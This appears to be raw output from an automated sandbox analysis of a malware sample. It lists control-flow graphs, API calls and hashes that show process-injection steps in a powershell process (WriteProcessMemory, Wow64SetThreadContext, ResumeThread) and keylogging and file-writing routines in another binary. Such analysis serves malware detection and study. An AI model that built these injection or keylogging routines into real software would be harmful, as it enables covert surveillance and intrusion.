                                                                                  • Instruction Fuzzy Hash: 8302F231E0EB898FEB96BB2858587B57BE1EF56290F1801FBC04DC7193EA199C09C355

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cedc3d84b0e2c19e1b74b16aaede09eca54d3eaaeb3953013e8d721da6d88a2
                                                                                  • Instruction ID: a4c044abd66741c181cccac51615d0e43a837cbfb0436250d1680dd5336a1f9e
                                                                                  • Opcode Fuzzy Hash: 6cedc3d84b0e2c19e1b74b16aaede09eca54d3eaaeb3953013e8d721da6d88a2
                                                                                  • Instruction Fuzzy Hash: 91C1823190DB988FDB66DF2888556E9BBF0EF5A310F0442DBD049D7252DB34A985CB81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H}H
                                                                                  • API String ID: 0-989461704
                                                                                  • Opcode ID: b0878dc1e9a6290a96615bd52baad03e4032938e4f26f1eeba745d95b5ad0ba2
                                                                                  • Instruction ID: c20282d0d8115cea26e192008aafc69872ec698cfe0b0451daa2403f0a1ad1cd
                                                                                  • Opcode Fuzzy Hash: b0878dc1e9a6290a96615bd52baad03e4032938e4f26f1eeba745d95b5ad0ba2
                                                                                  • Instruction Fuzzy Hash: 7EF1E52190EBC58FE79AA73898656703BE1EF56250F2940FEC089CB1E3DE19DC4AC355

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 89381c6b3dd415e7137b5778a5c25abd424277e277f0cf219466f6dc51c9112c
                                                                                  • Instruction ID: e0336877430209525b3d6230872def9b5f46378c681fa377c1b810bb9089cf06
                                                                                  • Opcode Fuzzy Hash: 89381c6b3dd415e7137b5778a5c25abd424277e277f0cf219466f6dc51c9112c
                                                                                  • Instruction Fuzzy Hash: 79A18B3190CA9C8FDBA5EF588845AE9BBF0FF59310F1442AAD449E7251CB34A985CF81

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: be098bcd660a11dcdb5f3941d762800000640927cf23ca4df29eaadc60390254
                                                                                  • Instruction ID: 4d7706dd97d3c060436327cbdab491d05c364b9b4d2ede7093c26ba05c5fa7af
                                                                                  • Opcode Fuzzy Hash: be098bcd660a11dcdb5f3941d762800000640927cf23ca4df29eaadc60390254
                                                                                  • Instruction Fuzzy Hash: A4815971D1CA5C8FDBA8EF58D845AE9B7F1FB98310F0042AAD40DE3251CB30A9858F81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 259 7ff848cdbd66-7ff848cdbd8a 260 7ff848cdbda2-7ff848cdbdaa 259->260 261 7ff848cdbd8c-7ff848cdbd9e 259->261 263 7ff848cdbdc3-7ff848cdbdd3 260->263 264 7ff848cdbdac-7ff848cdbdbd 260->264 265 7ff848cdbda1 261->265 266 7ff848cdbdff-7ff848cdbe75 261->266 264->263 265->260 270 7ff848cdbe77-7ff848cdbe7c 266->270 271 7ff848cdbe7f-7ff848cdbeb1 Wow64SetThreadContext 266->271 270->271 272 7ff848cdbeb3 271->272 273 7ff848cdbeb9-7ff848cdbee0 271->273 272->273
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1e5c25489585cbb4ca0a99fb9b5b8cb3ff1358ca643d567e876520456786e43d
                                                                                  • Instruction ID: da221f09c8da60f26530e8bee2595479ec39da11d46da77f5462af7617f1e94e
                                                                                  • Opcode Fuzzy Hash: 1e5c25489585cbb4ca0a99fb9b5b8cb3ff1358ca643d567e876520456786e43d
                                                                                  • Instruction Fuzzy Hash: 5C41243190CB5C8FEBA9EF58D849AFA7BE0FB95320F04416BD009C3156DB34A846CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 274 7ff848cdc0e4-7ff848cdc0eb 275 7ff848cdc0f6-7ff848cdc180 274->275 276 7ff848cdc0ed-7ff848cdc0f5 274->276 278 7ff848cdc182-7ff848cdc187 275->278 279 7ff848cdc18a-7ff848cdc1cf WriteProcessMemory 275->279 276->275 278->279 280 7ff848cdc1d7-7ff848cdc201 279->280 281 7ff848cdc1d1 279->281 281->280
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: f67fc7b614b7d3bc46314fc06ba85a6a71cd6b629543fc86796220ce1f504698
                                                                                  • Instruction ID: 9b6e695caa20ae57c6ae64efaf72552a996eb5fd7aeaa3b0ec4c8fa47496beb9
                                                                                  • Opcode Fuzzy Hash: f67fc7b614b7d3bc46314fc06ba85a6a71cd6b629543fc86796220ce1f504698
                                                                                  • Instruction Fuzzy Hash: 6341E67090CB588FDB18EF5898496E9BBE0EB59311F04426FE489D3252CB74A845CB96

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 282 7ff848cdbdd5-7ff848cdbde1 283 7ff848cdbde3-7ff848cdbdeb 282->283 284 7ff848cdbdec-7ff848cdbe75 282->284 283->284 287 7ff848cdbe77-7ff848cdbe7c 284->287 288 7ff848cdbe7f-7ff848cdbeb1 Wow64SetThreadContext 284->288 287->288 289 7ff848cdbeb3 288->289 290 7ff848cdbeb9-7ff848cdbee0 288->290 289->290
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 5f7a41b27392c3b591d48d9eb4d03f9e408657401b1dbec6dc077b3735c2ac97
                                                                                  • Instruction ID: 9948ec0ab0ecbc766fa4358a93e83bfee71212e91de3a356015b115cc329e279
                                                                                  • Opcode Fuzzy Hash: 5f7a41b27392c3b591d48d9eb4d03f9e408657401b1dbec6dc077b3735c2ac97
                                                                                  • Instruction Fuzzy Hash: 1F41063190D7988FDB56EF6888857E97FE0EF56320F08429BD048C7196DB64A405CB92

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 291 7ff848cdc205-7ff848cdc211 292 7ff848cdc213-7ff848cdc21b 291->292 293 7ff848cdc21c-7ff848cdc2a9 ResumeThread 291->293 292->293 296 7ff848cdc2b1-7ff848cdc2cd 293->296 297 7ff848cdc2ab 293->297 297->296
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2444659298.00007FF848CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848cd0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: d5dc37ad8a15f90cc92dd4d5a45dbd970c5754dc373682686f3f4cb03f649ffa
                                                                                  • Instruction ID: 51e9670688e7556820d1a5486d9be7d4fe34e64ef89658bd6edec1ac1269150d
                                                                                  • Opcode Fuzzy Hash: d5dc37ad8a15f90cc92dd4d5a45dbd970c5754dc373682686f3f4cb03f649ffa
                                                                                  • Instruction Fuzzy Hash: 2A21E33090CA4C8FDB59EB589849BE9BBE0FB56320F04425FD049C3692C7606416CB81

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c76ee228a3878d3067ec046119ad61c137471171b8815f93e5d9d641629fe83
                                                                                  • Instruction ID: 7896c69e56fc68b68042091c50ec4430c0eeee0293adb87998710b6b3d27cfa4
                                                                                  • Opcode Fuzzy Hash: 4c76ee228a3878d3067ec046119ad61c137471171b8815f93e5d9d641629fe83
                                                                                  • Instruction Fuzzy Hash: FC71E121E0EBC98FE796BB284868374BFE0EF56254F5801FAD048CB193EA599C49C345

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77cf53d052685621578c2c199f9e2a812e48f825f62978f12ea1b8bb8d63f8ce
                                                                                  • Instruction ID: ca8f7650f1d6d25223bc1e48881b37d68b43dbe17961a147a7231b58ed2c8965
                                                                                  • Opcode Fuzzy Hash: 77cf53d052685621578c2c199f9e2a812e48f825f62978f12ea1b8bb8d63f8ce
                                                                                  • Instruction Fuzzy Hash: 8D610B22E0FF865FEB96A67C14553B9B6D1EF556A0F9801BAC01EC31D7DF089C098349

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 599592e2b41bd0b37d10a8e2f48ba12bcfab88ee9f899ffe27c5beabbbe0d293
                                                                                  • Instruction ID: b6f3c9e213ba6896dd0abd0af95d46f0888db13f44092a98daaba9c19844da70
                                                                                  • Opcode Fuzzy Hash: 599592e2b41bd0b37d10a8e2f48ba12bcfab88ee9f899ffe27c5beabbbe0d293
                                                                                  • Instruction Fuzzy Hash: A0418572A0DB898FEB54BF1CA4422B87BE0EF55760F1401ABD549C3192D725AC45C7C5

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2448093117.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ff848da0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eaa85dfc12a67904d34276a7d32a4d7a4e95da6fd3da2cd4fb46c64c0b811903
                                                                                  • Instruction ID: 463809b459446a5c595fd8ff144044f1aec35fd9d55beb94d037a381b9d6728a
                                                                                  • Opcode Fuzzy Hash: eaa85dfc12a67904d34276a7d32a4d7a4e95da6fd3da2cd4fb46c64c0b811903
                                                                                  • Instruction Fuzzy Hash: F341D822E5FB872FF79BA66C1455378B6D1EF952A0FA801BAD42DC31D6DF0C9C094209

                                                                                  Execution Graph

                                                                                  Execution Coverage:3.5%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:14.7%
                                                                                  Total number of Nodes:1317
                                                                                  Total number of Limit Nodes:57
40c6aa 46766->46770 46771 40c7b1 46767->46771 46769 40c6fc 46768->46769 46772 401ee9 11 API calls 46769->46772 46773 401ee9 11 API calls 46770->46773 46774 401ee9 11 API calls 46771->46774 46772->46741 46773->46741 46775 40c7ba 46774->46775 46776 401ee9 11 API calls 46775->46776 46777 40c7c3 46776->46777 46778 401ee9 11 API calls 46777->46778 46779 40c7cc 46778->46779 46779->46235 46780->46246 46781->46260 46782->46264 46783->46174 46784->46210 46785->46302 46786->46291 46787->46150 46790 4194b0 LoadResource LockResource SizeofResource 46789->46790 46791 40dd9e 46789->46791 46790->46791 46791->46406 46793 40209f 46792->46793 46801 4023ae 46793->46801 46795 4020aa 46805 4024ea 46795->46805 46797 4020b9 46797->46410 46799 402097 28 API calls 46798->46799 46800 406302 46799->46800 46800->46417 46802 402408 46801->46802 46803 4023b8 46801->46803 46802->46795 46803->46802 46812 402787 11 API calls std::_Deallocate 46803->46812 46806 4024fa 46805->46806 46807 402500 46806->46807 46808 402515 46806->46808 46813 402549 46807->46813 46823 4028c8 46808->46823 46811 402513 46811->46797 46812->46802 46834 402868 46813->46834 46815 40255d 46816 402572 46815->46816 46817 402587 46815->46817 46839 402a14 22 API calls 46816->46839 46818 4028c8 28 API calls 46817->46818 46822 402585 46818->46822 46820 40257b 46840 4029ba 22 API calls 46820->46840 46822->46811 46824 4028d1 46823->46824 46825 402933 46824->46825 46826 4028db 46824->46826 46848 402884 22 API calls 46825->46848 46829 4028e4 46826->46829 46831 4028f7 46826->46831 46842 402c8e 46829->46842 46832 4028f5 46831->46832 46833 4023ae 11 API calls 46831->46833 46832->46811 46833->46832 46835 402870 46834->46835 46836 402878 46835->46836 46841 402c83 22 API calls 46835->46841 46836->46815 46839->46820 46840->46822 46843 402c98 __EH_prolog 46842->46843 46849 402e34 22 API calls 46843->46849 46845 4023ae 11 API calls 46847 402d72 46845->46847 46846 402d04 46846->46845 46847->46832 46849->46846 46851 4020c7 46850->46851 46852 
4023ae 11 API calls 46851->46852 46853 4020d2 46852->46853 46853->46445 46854->46445 46855->46445 46856->46435 46857->46426 46858->46449 46859->46454 46860->46452 46864 40328a 46862->46864 46863 4032a9 46863->46465 46864->46863 46865 4028c8 28 API calls 46864->46865 46865->46863 46867 4051db 46866->46867 46876 405254 46867->46876 46869 4051e8 46869->46468 46871 402041 46870->46871 46872 4023ae 11 API calls 46871->46872 46873 40205b 46872->46873 46898 40265a 46873->46898 46877 405262 46876->46877 46878 405268 46877->46878 46879 40527e 46877->46879 46887 4025d0 46878->46887 46881 4052d5 46879->46881 46882 405296 46879->46882 46896 402884 22 API calls 46881->46896 46885 4028c8 28 API calls 46882->46885 46886 40527c 46882->46886 46885->46886 46886->46869 46888 402868 22 API calls 46887->46888 46889 4025e2 46888->46889 46890 402652 46889->46890 46891 402609 46889->46891 46897 402884 22 API calls 46890->46897 46893 4028c8 28 API calls 46891->46893 46895 40261b 46891->46895 46893->46895 46895->46886 46899 40266b 46898->46899 46900 4023ae 11 API calls 46899->46900 46901 40206d 46900->46901 46901->46471 46902->46473 46903->46484 46905 419f30 GetCurrentProcess 46904->46905 46906 4192bc 46904->46906 46905->46906 46907 411f91 RegOpenKeyExA 46906->46907 46908 411fbf RegQueryValueExA RegCloseKey 46907->46908 46909 411fe9 46907->46909 46908->46909 46910 402073 28 API calls 46909->46910 46911 411ffe 46910->46911 46911->46500 46912->46508 46914 4024d9 46913->46914 46915 4024ea 28 API calls 46914->46915 46916 402091 46915->46916 46916->46190 46933 4397c5 46917->46933 46919 438c0b 46939 438557 35 API calls 3 library calls 46919->46939 46920 438bd0 46920->46919 46921 438be5 46920->46921 46932 438bea pre_c_initialization 46920->46932 46938 43ad91 20 API calls _free 46921->46938 46925 438c17 46926 438c46 46925->46926 46940 43980a 39 API calls __Toupper 46925->46940 46929 438cb2 46926->46929 46941 439771 20 API calls 2 library calls 46926->46941 46942 439771 20 API calls 2 library calls 
46929->46942 46930 438d79 _strftime 46930->46932 46943 43ad91 20 API calls _free 46930->46943 46932->46537 46934 4397ca 46933->46934 46935 4397dd 46933->46935 46944 43ad91 20 API calls _free 46934->46944 46935->46920 46937 4397cf pre_c_initialization 46937->46920 46938->46932 46939->46925 46940->46925 46941->46929 46942->46930 46943->46932 46944->46937 46951 401f90 46945->46951 46947 402efe 46948 402035 11 API calls 46947->46948 46949 402f0d 46948->46949 46949->46551 46950->46554 46952 4025d0 28 API calls 46951->46952 46953 401f9d 46952->46953 46953->46947 46955 401f6e 46954->46955 46993 402232 46955->46993 46957 401f79 46957->46564 46959 4080ae 46958->46959 46960 402232 11 API calls 46959->46960 46961 4080c8 46960->46961 46998 404247 46961->46998 46963 4080d6 46964 409203 46963->46964 47011 40a83c 46964->47011 46967 409257 46970 402073 28 API calls 46967->46970 46968 40922f 46969 402073 28 API calls 46968->46969 46971 409239 46969->46971 46972 409262 46970->46972 47015 419bca 28 API calls 46971->47015 46974 402073 28 API calls 46972->46974 46976 409271 46974->46976 46975 409247 47016 40a0b0 31 API calls _Yarn 46975->47016 46978 4194da 79 API calls 46976->46978 46979 409276 CreateThread 46978->46979 46981 409291 CreateThread 46979->46981 46982 40929d CreateThread 46979->46982 47024 409305 46979->47024 46980 40924e 46983 401fb8 11 API calls 46980->46983 46981->46982 47021 4092ef 46981->47021 46984 401ee9 11 API calls 46982->46984 47018 409311 46982->47018 46983->46967 46985 4092b1 46984->46985 46985->46583 46986->46581 47148 403202 46987->47148 46989 403002 47152 403242 46989->47152 46992->46597 47176 4092fb 162 API calls 46992->47176 46994 40228c 46993->46994 46995 40223c 46993->46995 46994->46957 46995->46994 46997 402759 11 API calls std::_Deallocate 46995->46997 46997->46994 46999 402868 22 API calls 46998->46999 47000 40425b 46999->47000 47001 404270 47000->47001 47002 404285 47000->47002 47008 4042bf 22 API calls 47001->47008 47010 4027c6 28 API calls 
47002->47010 47005 404279 47009 402c28 22 API calls 47005->47009 47007 404283 47007->46963 47008->47005 47009->47007 47010->47007 47012 40a845 47011->47012 47013 409221 47011->47013 47017 40a8bc 28 API calls 47012->47017 47013->46967 47013->46968 47015->46975 47016->46980 47017->47013 47027 409c1f 47018->47027 47073 409340 47021->47073 47089 40971e 47024->47089 47034 409c2d 47027->47034 47028 40931a 47029 409c87 Sleep GetForegroundWindow GetWindowTextLengthW 47057 40a854 47029->47057 47033 401f66 11 API calls 47033->47034 47034->47028 47034->47029 47034->47033 47037 409ccd GetWindowTextW 47034->47037 47056 409ce7 47034->47056 47063 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 47034->47063 47064 432525 23 API calls __onexit 47034->47064 47065 43215c SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 47034->47065 47036 419ac6 GetTickCount 47036->47056 47037->47034 47039 40a83c 28 API calls 47039->47056 47040 409e25 47041 401ee9 11 API calls 47040->47041 47041->47028 47042 409d92 Sleep 47042->47056 47045 402073 28 API calls 47045->47056 47046 4052dd 28 API calls 47046->47056 47047 408098 28 API calls 47047->47056 47049 408209 28 API calls 47049->47056 47051 402ff4 28 API calls 47051->47056 47053 401ee9 11 API calls 47053->47056 47054 40962e 12 API calls 47054->47056 47055 401fb8 11 API calls 47055->47056 47056->47034 47056->47036 47056->47039 47056->47040 47056->47042 47056->47045 47056->47046 47056->47047 47056->47049 47056->47051 47056->47053 47056->47054 47056->47055 47066 408080 28 API calls 47056->47066 47067 40a0b0 31 API calls _Yarn 47056->47067 47068 40a8cc 28 API calls 47056->47068 47069 40a694 40 API calls 2 library calls 47056->47069 47070 43f34f 20 API calls 47056->47070 47071 419bca 28 API calls 47056->47071 47058 40a85c 47057->47058 47059 402232 11 API calls 47058->47059 47060 40a867 47059->47060 47072 40a87c 28 API calls 47060->47072 47062 40a876 
47062->47034 47064->47034 47065->47034 47066->47056 47067->47056 47068->47056 47069->47056 47070->47056 47071->47056 47072->47062 47074 409359 GetModuleHandleA SetWindowsHookExA 47073->47074 47075 4093bb GetMessageA 47073->47075 47074->47075 47077 409375 GetLastError 47074->47077 47076 4093cd TranslateMessage DispatchMessageA 47075->47076 47087 4092f8 47075->47087 47076->47075 47076->47087 47088 419b16 28 API calls 47077->47088 47079 409386 47080 4052dd 28 API calls 47079->47080 47081 409396 47080->47081 47082 402073 28 API calls 47081->47082 47083 4093a5 47082->47083 47084 4194da 79 API calls 47083->47084 47085 4093aa 47084->47085 47086 401fb8 11 API calls 47085->47086 47086->47087 47088->47079 47090 409733 Sleep 47089->47090 47110 40966d 47090->47110 47092 40930e 47093 409773 CreateDirectoryW 47099 409745 47093->47099 47094 409784 GetFileAttributesW 47094->47099 47095 40979b SetFileAttributesW 47095->47099 47096 4020bf 11 API calls 47108 4097e6 47096->47108 47098 409815 PathFileExistsW 47098->47108 47099->47090 47099->47092 47099->47093 47099->47094 47099->47095 47100 401e45 22 API calls 47099->47100 47099->47108 47123 41a17b 47099->47123 47100->47099 47102 402097 28 API calls 47102->47108 47103 40991e SetFileAttributesW 47103->47099 47104 401fb8 11 API calls 47104->47108 47105 4062ee 28 API calls 47105->47108 47106 401fc2 28 API calls 47106->47108 47108->47096 47108->47098 47108->47102 47108->47103 47108->47104 47108->47105 47108->47106 47109 401fb8 11 API calls 47108->47109 47133 41a20f CreateFileW 47108->47133 47141 41a27c CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 47108->47141 47109->47099 47111 40971a 47110->47111 47114 409683 47110->47114 47111->47099 47112 4096a2 CreateFileW 47113 4096b0 GetFileSize 47112->47113 47112->47114 47113->47114 47115 4096e5 CloseHandle 47113->47115 47114->47112 47114->47115 47116 4096f7 47114->47116 47117 4096d3 47114->47117 47118 4096da Sleep 47114->47118 47115->47114 47116->47111 47120 408098 28 API calls 
47116->47120 47142 40a025 83 API calls 47117->47142 47118->47115 47121 409713 47120->47121 47122 409203 123 API calls 47121->47122 47122->47111 47124 41a18e CreateFileW 47123->47124 47126 41a1c7 47124->47126 47127 41a1cb 47124->47127 47126->47099 47128 41a1d2 SetFilePointer 47127->47128 47129 41a1eb WriteFile 47127->47129 47128->47129 47130 41a1e2 CloseHandle 47128->47130 47131 41a200 CloseHandle 47129->47131 47132 41a1fe 47129->47132 47130->47126 47131->47126 47132->47131 47134 41a239 GetFileSize 47133->47134 47135 41a235 47133->47135 47143 40242e 47134->47143 47135->47108 47137 41a24d 47138 41a25f ReadFile 47137->47138 47139 41a26c 47138->47139 47140 41a26e CloseHandle 47138->47140 47139->47140 47140->47135 47141->47108 47142->47118 47144 402436 47143->47144 47146 402440 47144->47146 47147 402a31 28 API calls 47144->47147 47146->47137 47147->47146 47149 40320e 47148->47149 47158 4035f8 47149->47158 47151 40321b 47151->46989 47153 40324e 47152->47153 47154 402232 11 API calls 47153->47154 47155 403268 47154->47155 47172 402316 47155->47172 47159 403606 47158->47159 47160 403624 47159->47160 47161 40360c 47159->47161 47163 40363c 47160->47163 47164 40367e 47160->47164 47169 403686 28 API calls 47161->47169 47168 403622 47163->47168 47170 4027c6 28 API calls 47163->47170 47171 402884 22 API calls 47164->47171 47168->47151 47169->47168 47170->47168 47173 402327 47172->47173 47174 402232 11 API calls 47173->47174 47175 4023a7 47174->47175 47175->46593 47178 404166 47177->47178 47179 402232 11 API calls 47178->47179 47180 404171 47179->47180 47188 40419c 47180->47188 47183 4042dc 47200 404333 47183->47200 47185 4042ea 47186 403242 11 API calls 47185->47186 47187 4042f9 47186->47187 47187->46604 47189 4041a8 47188->47189 47192 4041b9 47189->47192 47191 40417c 47191->47183 47193 4041c9 47192->47193 47194 4041e6 47193->47194 47195 4041cf 47193->47195 47199 4027c6 28 API calls 47194->47199 47197 404247 28 API calls 47195->47197 47198 4041e4 47197->47198 47198->47191 
47199->47198 47201 40433f 47200->47201 47204 404351 47201->47204 47203 40434d 47203->47185 47205 40435f 47204->47205 47206 404365 47205->47206 47207 40437e 47205->47207 47270 4034c6 28 API calls 47206->47270 47208 402868 22 API calls 47207->47208 47209 404386 47208->47209 47211 4043f9 47209->47211 47212 40439f 47209->47212 47272 402884 22 API calls 47211->47272 47223 40437c 47212->47223 47271 4027c6 28 API calls 47212->47271 47223->47203 47270->47223 47271->47223 47273->46612 47278 4198da _Yarn ___scrt_fastfail 47275->47278 47276 402073 28 API calls 47277 41399f 47276->47277 47277->46629 47278->47276 47279->46646 47281 413958 getaddrinfo WSASetLastError 47280->47281 47282 41394e 47280->47282 47281->46654 47395 4137dc 29 API calls ___std_exception_copy 47282->47395 47284 413953 47284->47281 47286 404826 socket 47285->47286 47287 404819 47285->47287 47288 404840 CreateEventW 47286->47288 47289 404822 47286->47289 47396 40487e WSAStartup 47287->47396 47288->46654 47289->46654 47291 40481e 47291->47286 47291->47289 47293 404f45 47292->47293 47295 404fca 47292->47295 47294 404f4e 47293->47294 47296 404fa0 CreateEventA CreateThread 47293->47296 47297 404f5d GetLocalTime 47293->47297 47294->47296 47295->46654 47296->47295 47398 405130 47296->47398 47397 419b16 28 API calls 47297->47397 47299 404f71 47300 4052dd 28 API calls 47299->47300 47301 404f81 47300->47301 47302 402073 28 API calls 47301->47302 47303 404f90 47302->47303 47304 4194da 79 API calls 47303->47304 47305 404f95 47304->47305 47306 401fb8 11 API calls 47305->47306 47306->47296 47308 4049fb 47307->47308 47309 4048ce 47307->47309 47310 40495e 47308->47310 47311 404a01 WSAGetLastError 47308->47311 47309->47310 47314 4052fe 28 API calls 47309->47314 47330 404903 47309->47330 47310->46654 47311->47310 47312 404a11 47311->47312 47315 404a16 47312->47315 47317 404912 47312->47317 47318 4048ef 47314->47318 47413 41a86b 30 API calls 47315->47413 47316 40490b 47316->47317 47320 404921 47316->47320 47321 402073 28 API 
calls 47317->47321 47322 402073 28 API calls 47318->47322 47332 404930 47320->47332 47333 404967 47320->47333 47325 404a60 47321->47325 47326 4048fe 47322->47326 47323 404a20 47324 4052dd 28 API calls 47323->47324 47327 404a30 47324->47327 47328 402073 28 API calls 47325->47328 47329 4194da 79 API calls 47326->47329 47331 402073 28 API calls 47327->47331 47334 404a6f 47328->47334 47329->47330 47402 41ea15 27 API calls 47330->47402 47335 404a3f 47331->47335 47337 402073 28 API calls 47332->47337 47410 41f7f5 53 API calls 47333->47410 47338 4194da 79 API calls 47334->47338 47339 4194da 79 API calls 47335->47339 47341 40493f 47337->47341 47338->47310 47342 404a44 47339->47342 47340 40496f 47343 4049a4 47340->47343 47344 404974 47340->47344 47345 402073 28 API calls 47341->47345 47346 401fb8 11 API calls 47342->47346 47412 41ebbb 28 API calls 47343->47412 47347 402073 28 API calls 47344->47347 47348 40494e 47345->47348 47346->47310 47351 404983 47347->47351 47352 4194da 79 API calls 47348->47352 47350 4049ac 47353 4049d9 CreateEventW CreateEventW 47350->47353 47356 402073 28 API calls 47350->47356 47354 402073 28 API calls 47351->47354 47355 404953 47352->47355 47353->47310 47357 404992 47354->47357 47403 41ea55 47355->47403 47359 4049c2 47356->47359 47360 4194da 79 API calls 47357->47360 47361 402073 28 API calls 47359->47361 47362 404997 47360->47362 47363 4049d1 47361->47363 47411 41ee67 51 API calls 47362->47411 47365 4194da 79 API calls 47363->47365 47366 4049d6 47365->47366 47366->47353 47368 404e20 SetEvent CloseHandle 47367->47368 47369 404e37 closesocket 47367->47369 47370 404eb8 47368->47370 47371 404e44 47369->47371 47370->46654 47372 404e53 47371->47372 47373 404e5a 47371->47373 47416 4050c4 83 API calls 47372->47416 47375 404e6c WaitForSingleObject 47373->47375 47376 404eae SetEvent CloseHandle 47373->47376 47377 41ea55 3 API calls 47375->47377 47376->47370 47378 404e7b SetEvent WaitForSingleObject 47377->47378 47379 41ea55 3 API calls 47378->47379 47380 
